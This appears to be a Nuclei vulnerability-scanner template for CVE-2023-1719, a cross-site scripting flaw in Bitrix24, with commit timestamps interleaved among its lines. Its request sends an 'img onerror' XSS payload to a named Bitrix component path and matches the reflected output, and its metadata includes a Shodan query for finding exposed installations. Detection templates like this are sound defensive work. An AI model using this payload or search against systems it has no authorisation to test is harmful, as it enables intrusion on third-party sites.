2023-11-06 16:45:38 +00:00
id : CVE-2023-1719
info :
2023-11-07 14:39:24 +00:00
name : Bitrix Component - Cross-Site Scripting
2023-11-06 16:45:38 +00:00
author : DhiyaneshDk
2023-11-10 09:15:01 +00:00
severity : critical
2023-11-06 16:45:38 +00:00
description : |
Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’
reference :
- https://starlabs.sg/advisories/23/23-1719/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1719
classification :
2023-11-10 09:15:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-11-06 16:45:38 +00:00
cve-id : CVE-2023-1719
cwe-id : CWE-665
2023-11-10 17:07:52 +00:00
epss-score : 0.02807
2023-12-12 11:07:52 +00:00
epss-percentile : 0.8953
2023-11-10 09:15:01 +00:00
cpe : cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
2023-11-06 16:45:38 +00:00
metadata :
2023-11-07 14:39:24 +00:00
verified : true
2023-11-07 14:54:31 +00:00
max-request : 1
2023-11-06 16:45:38 +00:00
vendor : bitrix24
product : bitrix24
2023-11-07 14:54:31 +00:00
shodan-query : html:"/bitrix/"
2023-12-05 09:50:33 +00:00
tags : cve,cve2023,bitrix,xss,bitrix24
2023-11-06 16:45:38 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'LOG_CNT':"
- "<img onerror=alert(document.domain) src=1>"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2023-12-12 12:02:03 +00:00
# digest: 4a0a00473045022100ef00a1892c68fc81d9814a2fd25511cd4dcbe6053c4f9582f4fae7009fab805d02205b647a369f89f40bc31e121b27064cc12f7ba5000ee7ae2739c41a98c31be736:922c64590222798bb761d5b6d8e72950
